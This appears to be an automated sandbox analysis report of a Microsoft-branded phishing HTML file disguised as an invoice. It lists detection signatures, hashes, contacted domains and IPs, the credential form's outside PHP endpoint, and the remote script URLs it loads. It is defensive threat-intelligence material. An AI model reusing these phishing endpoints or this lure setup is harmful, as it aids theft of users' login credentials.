Play interactive tour

Edit tour

Analysis Report cremocompany-Invoice_216083-xlsx.html

Overview

General Information

Sample Name:	cremocompany-Invoice_216083-xlsx.html
Analysis ID:	339241
MD5:	1a47aae367d4ac2427943631bd4d08f5
SHA1:	87fc8341efabb13c8a33d6acb28bb6e5a5d23b54
SHA256:	9c7b05df9abde7ae8d91cfea08ca275132a6692bec1875aca9c49f1b74f766c9
Most interesting Screenshot:

Detection

HTMLPhisher

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish_6

Obfuscated HTML file found

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML title does not match URL

IP address seen in connection with other malware

Invalid T&C link found

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Suspicious form URL found

Classification

Startup

System is w10x64

iexplore.exe (PID: 3112 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5396 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3112 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\5343434322[1].js	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\7565654564[1].js	JoeSecurity_HtmlPhish_6	Yara detected HtmlPhish_6	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Phishing:

Yara detected HtmlPhish_6

Show sources

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\5343434322[1].js, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\7565654564[1].js, type: DROPPED

Phishing site detected (based on image similarity)

Show sources

Source: http://svgur.com/i/G6D.svg

Matcher: Found strong image similarity, brand: Microsoft

Jump to dropped file

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Title: Microsoft Office Center does not match URL
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Title: Microsoft Office Center does not match URL

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Invalid link: Privacy & cookies
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Invalid link: Terms of use
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Invalid link: Privacy & cookies

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Form action: http://www.tanikawashuntaro.com/dir/443545/009808989.php?455455667-78766
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: Form action: http://www.tanikawashuntaro.com/dir/443545/009808989.php?455455667-78766

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	HTTP Parser: No <meta name="copyright".. found

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.20.138.65:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.138.65:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.207.103.145:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.207.103.145:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.239.131.51:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.239.131.51:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.91.224.95:443 -> 192.168.2.3:49737 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 145.239.131.51 145.239.131.51
Source: Joe Sandbox View	IP Address: 51.91.224.95 51.91.224.95
Source: Joe Sandbox View	IP Address: 216.239.38.21 216.239.38.21
Source: Joe Sandbox View	IP Address: 216.239.38.21 216.239.38.21

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKLink: <https://webmention.herokuapp.com/api/webmention>; rel="webmention"ETag: sha1-0BoicgkYt4Ezi1u/kgKyQaX5nuQ= sha256-BNKSSO46E6B0UYyToY1u/Ekb8fKY+bh/yYmmrkufrXo=X-Cloud-Trace-Context: e26ffe84e2d12ae06f60b0d77789b2e8Content-Type: image/svg+xmlContent-Encoding: gzipDate: Wed, 13 Jan 2021 02:15:36 GMTServer: Google FrontendContent-Length: 1569Age: 53971Cache-Control: public, max-age=315360000Data Raw: 1f 8b 08 00 00 00 00 00 02 ff b4 97 4b 6f 5b 37 10 85 ff 8a a0 6e af 68 be c9 5b d8 01 d2 95 17 f6 d6 8b ec 94 c6 8e 0c d8 4d 10 0b 76 fa ef fb 1d ce bd b2 0b b4 0d b2 28 1c 1d 28 3c e4 70 38 8f 43 ea fc e9 f9 f3 e6 fb e3 c3 1f 4f 17 db c3 f1 f8 f5 d7 b3 b3 97 97 17 f7 92 dc 97 6f 9f cf a2 f7 fe 8c 19 db cd cb fd a7 e3 e1 62 1b 7c df 6e 0e b7 f7 9f 0f c7 8b 6d cc db cd f3 fd ed cb 6f 5f be 5f 6c fd c6 6f 60 37 0c be 3b 3f de 1f 1f 6e df ed 9f 9e 6e 8f 4f e7 67 f6 bf f3 af fb e3 61 f3 e9 62 7b 9d b3 eb a9 4e d9 d5 9b d0 5d 3e ec a2 cb 37 cd 95 9e 2e 33 5f af 52 77 21 cc 93 b8 cb 54 5d 49 e1 2a 45 17 72 9c c6 a4 c3 ce f9 38 8f a5 97 71 76 f3 0d 86 0e c9 e5 54 af 52 73 69 0a 32 7f 70 be f4 ab 1c 5c c9 45 3b 7d 78 8c 53 70 3e cf fb e0 62 ed 7c 17 7a fe c2 e4 72 98 77 6e ae 8d d1 1c 30 30 d0 b8 b0 73 09 57 00 ad 17 2e e3 f8 e0 b2 86 c6 67 35 e4 e6 32 6c e7 15 07 b1 c3 60 86 1a a6 a3 a8 0c 1a 85 53 18 e9 e5 3d 83 22 16 fb b9 b9 58 a6 ea ea f0 37 c0 c4 1a 96 25 2e 7b f9 9b fb 75 9e b1 6c 81 62 81 ef e1 a6 bb e2 db e5 18 ff f0 c8 50 cd bb e0 ea 9c f7 c9 45 8e 66 a8 9d 39 38 21 2d 3b 17 b1 40 c4 c2 8a 27 b2 40 d6 54 08 f4 9e 00 d6 11 46 70 75 3b d6 ea 72 0f f8 d8 7b 5d 70 e5 4a c9 2e d4 8c dd e6 db 82 c6 11 86 d0 77 a0 ef 53 71 95 bd 0d 07 ab f3 ef 92 9b 53 64 d4 97 b2 a0 71 8c e3 91 25 b4 28 a0 b0 c2 75 65 8a da b3 b3 5b 4e 3a 8b 70 e5 7c 4d e4 ee 39 ba 98 12 87 69 35 c9 29 50 13 3c 46 49 73 25 02 c9 85 9e 17 3c 51 8a 51 68 53 c4 f3 79 41 e3 30 17 f1 8a f9 a9 19 d8 b8 eb 59 d3 73 a8 8c c6 13 0e 72 22 d2 09 32 a5 2e 5b b4 81 a1 91 58 f4 33 d5 db ae 2b 87 9b ba 4b 39 ed 99 50 a2 a6 81 9a 46 c1 12 1d aa 92 9e 18 9f 65 30 b5 e2 02 67 4c a5 b3 c6 67 38 60 18 de d1 44 99 63 10 d2 48 d0 b5 a9 70 e1 7a 89 3b 17 54 df 9d ac 18 1a 45 3e 72 77 2d 46 0e 92 e9 0f c3 d5 24 cd 30 42 60 ad 58 bd 2b b1 58 01 1e f0 22 ce cf 24 ab cc 74 62 ea ef 23 56 e4 b1 50 eb a9 9b e4 3a fe 74 a7 40 28 f8 86 0b 79 3a fe a3 2a 24 96 fc be e8 60 7c 17 2e 93 9a 6b f8 30 bb 16 f6 1c 1d 6e cd b8 4c 93 d5 9c 46 09 22 1c 64 1b b4 65 c9 d5 38 ba 96 e2 c5 34 07 37 34 56 1d 9d 86 9b da b6 89 03 07 87 c5 44 a9 63 3c 31 ec a9 06 43 23 59 d4 14 c3 1c b5 e9 9c d4 2f c2 95 ad 44 19 03 25 be 67 bc ab 2b 84 b6 a9 5a c9 d7 29 e0 da 23 85 13 29 39 df 1a 3d 5b 30 60 a8 89 7e 72 2a ac 44 95 47 fa 5c c9 14 1a 45 b6 03 b9 0b e2 12 a2 67 68 5c c0 13 f2 2f 12 37 71 df 70 b1 59 11 89 b1 2b c3 b5 a8 0b 84 83 a4 2d 7a 17 39 f2 93 ba 52 28 34 12 b3 11 25 b2 8a ce 2a 38 e0 44 75 52 4b c9 b2 15 1a 60 b8 d8 d4 00 73 d3 23 0e c7 61 1d 99 a3 24 06 3d b9 84 f2 b7 ae ee cf b1 2e 68 14 d

Source: global traffic	HTTP traffic detected: GET /99821182021/5343434322.js HTTP/1.1Accept: application/javascript, /;q=0.8Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: yourjavascript.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /18210902102/7565654564.js HTTP/1.1Accept: application/javascript, /;q=0.8Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: yourjavascript.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /vHgYSJgT/arrow.jpg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: i.postimg.ccConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /i/G6D.svg HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: svgur.comConnection: Keep-Alive

Source: msapplication.xml0.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x26cf680a,0x01d6ea1b</date><accdate>0x26cf680a,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x26cf680a,0x01d6ea1b</date><accdate>0x26cf680a,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.1.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x26d42ca9,0x01d6ea1b</date><accdate>0x26d42ca9,0x01d6ea1b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: yourjavascript.com

Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://api.jquery.com/jQuery.browser
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://bugs.jquery.com/ticket/12282#comment:15
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://bugs.jquery.com/ticket/12359
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://dev.w3.org/csswg/cssom/#resolved-values
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript
Source: bootstrap.min[1].css.2.dr	String found in binary or memory: http://getbootstrap.com)
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_A
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://javascript.nwbox.com/IEContentLoaded/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://jquery.com/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://jquery.org/license
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://json.org/json2.js
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://perfectionkills.com/detecting-event-support-without-browser-sniffing/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://sizzlejs.com/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context
Source: msapplication.xml.1.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.1.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.1.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.1.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.1.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.1.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.1.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.1.dr	String found in binary or memory: http://www.youtube.com/
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=491668
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=649285
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://developer.mozilla.org/en/Security/CSP
Source: jquery-1.8.2[1].js.2.dr	String found in binary or memory: https://github.com/jquery/jquery/pull/764
Source: bootstrap.min[1].css.2.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: 0009098lm[1].css.2.dr	String found in binary or memory: https://i.ibb.co/518rjZQ/Fotoram-io.jpg

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.20.138.65:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.138.65:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.207.103.145:443 -> 192.168.2.3:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.207.103.145:443 -> 192.168.2.3:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.3:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.19.94:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.239.131.51:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 145.239.131.51:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.91.224.95:443 -> 192.168.2.3:49737 version: TLS 1.2

Source: classification engine

Classification label: mal56.phis.evad.winHTML@3/27@10/7

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DF9B8C62206A21CFC2.TMP

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3112 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3112 CREDAT:17410 /prefetch:2	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Data Obfuscation:

Obfuscated HTML file found

Show sources

Source: cremocompany-Invoice_216083-xlsx.html	Initial file: Did not found title: "Microsoft Office Center" in HTML/HTM content
Source: cremocompany-Invoice_216083-xlsx.html	Initial file: Did not found title: "Microsoft Office Center" in HTML/HTM content

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting1	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	File and Directory Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Scripting1	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer2	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
yourjavascript.com	2%	Virustotal	Browse
uceniciifbi.ro	0%	Virustotal	Browse
i.postimg.cc	0%	Virustotal	Browse
www.iconj.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	0%	URL Reputation	safe
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	0%	URL Reputation	safe
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	0%	URL Reputation	safe
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	0%	URL Reputation	safe
http://blindsignals.com/index.php/2009/07/jquery-delay/	0%	URL Reputation	safe
http://blindsignals.com/index.php/2009/07/jquery-delay/	0%	URL Reputation	safe
http://blindsignals.com/index.php/2009/07/jquery-delay/	0%	URL Reputation	safe
http://blindsignals.com/index.php/2009/07/jquery-delay/	0%	URL Reputation	safe
http://i.postimg.cc/vHgYSJgT/arrow.jpg	0%	Virustotal		Browse
http://i.postimg.cc/vHgYSJgT/arrow.jpg	0%	Avira URL Cloud	safe
http://yourjavascript.com/99821182021/5343434322.js	2%	Virustotal		Browse
http://yourjavascript.com/99821182021/5343434322.js	0%	Avira URL Cloud	safe
http://getbootstrap.com)	0%	Avira URL Cloud	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://www.wikipedia.com/	0%	URL Reputation	safe
http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291	0%	URL Reputation	safe
http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291	0%	URL Reputation	safe
http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291	0%	URL Reputation	safe
http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291	0%	URL Reputation	safe
http://javascript.nwbox.com/IEContentLoaded/	0%	URL Reputation	safe
http://javascript.nwbox.com/IEContentLoaded/	0%	URL Reputation	safe
http://javascript.nwbox.com/IEContentLoaded/	0%	URL Reputation	safe
http://javascript.nwbox.com/IEContentLoaded/	0%	URL Reputation	safe
http://yourjavascript.com/18210902102/7565654564.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tinyurl.com	104.20.138.65	true	false		high
yourjavascript.com	5.189.183.184	true	false	2%, Virustotal, Browse	unknown
cdnjs.cloudflare.com	104.16.19.94	true	false		high
uceniciifbi.ro	91.207.103.145	true	false	0%, Virustotal, Browse	unknown
i.postimg.cc	51.91.224.95	true	false	0%, Virustotal, Browse	unknown
svgur.com	216.239.38.21	true	false		high
i.ibb.co	145.239.131.51	true	false		high
code.jquery.com	unknown	unknown	false		high
www.iconj.com	unknown	unknown	false	0%, Virustotal, Browse	unknown
maxcdn.bootstrapcdn.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://svgur.com/i/G6D.svg	false		high
http://i.postimg.cc/vHgYSJgT/arrow.jpg	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://yourjavascript.com/99821182021/5343434322.js	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/cremocompany-Invoice_216083-xlsx.html	true		low
http://yourjavascript.com/18210902102/7565654564.js	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.nytimes.com/	msapplication.xml3.1.dr	false		high
http://bugs.jquery.com/ticket/12359	jquery-1.8.2[1].js.2.dr	false		high
http://jquery.org/license	jquery-1.8.2[1].js.2.dr	false		high
http://perfectionkills.com/detecting-event-support-without-browser-sniffing/	jquery-1.8.2[1].js.2.dr	false		high
http://json.org/json2.js	jquery-1.8.2[1].js.2.dr	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=649285	jquery-1.8.2[1].js.2.dr	false		high
http://sizzlejs.com/	jquery-1.8.2[1].js.2.dr	false		high
http://www.amazon.com/	msapplication.xml.1.dr	false		high
http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context	jquery-1.8.2[1].js.2.dr	false		high
http://www.twitter.com/	msapplication.xml5.1.dr	false		high
http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript	jquery-1.8.2[1].js.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bugs.webkit.org/show_bug.cgi?id=29084	jquery-1.8.2[1].js.2.dr	false		high
http://blindsignals.com/index.php/2009/07/jquery-delay/	jquery-1.8.2[1].js.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://bugs.jquery.com/ticket/12282#comment:15	jquery-1.8.2[1].js.2.dr	false		high
https://developer.mozilla.org/en-US/docs/CSS/display	jquery-1.8.2[1].js.2.dr	false		high
http://dev.w3.org/csswg/cssom/#resolved-values	jquery-1.8.2[1].js.2.dr	false		high
http://api.jquery.com/jQuery.browser	jquery-1.8.2[1].js.2.dr	false		high
https://developer.mozilla.org/en/Security/CSP	jquery-1.8.2[1].js.2.dr	false		high
http://www.youtube.com/	msapplication.xml7.1.dr	false		high
http://getbootstrap.com)	bootstrap.min[1].css.2.dr	false	Avira URL Cloud: safe	low
https://github.com/twbs/bootstrap/blob/master/LICENSE)	bootstrap.min[1].css.2.dr	false		high
http://www.wikipedia.com/	msapplication.xml6.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://i.ibb.co/518rjZQ/Fotoram-io.jpg	0009098lm[1].css.2.dr	false		high
http://www.live.com/	msapplication.xml2.1.dr	false		high
http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291	jquery-1.8.2[1].js.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_A	jquery-1.8.2[1].js.2.dr	false		high
https://github.com/jquery/jquery/pull/764	jquery-1.8.2[1].js.2.dr	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=491668	jquery-1.8.2[1].js.2.dr	false		high
http://www.reddit.com/	msapplication.xml4.1.dr	false		high
http://javascript.nwbox.com/IEContentLoaded/	jquery-1.8.2[1].js.2.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://jquery.com/	jquery-1.8.2[1].js.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
145.239.131.51	unknown	France	16276	OVHFR	false
51.91.224.95	unknown	France	16276	OVHFR	false
91.207.103.145	unknown	Romania	9009	M247GB	false
216.239.38.21	unknown	United States	15169	GOOGLEUS	false
104.20.138.65	unknown	United States	13335	CLOUDFLARENETUS	false
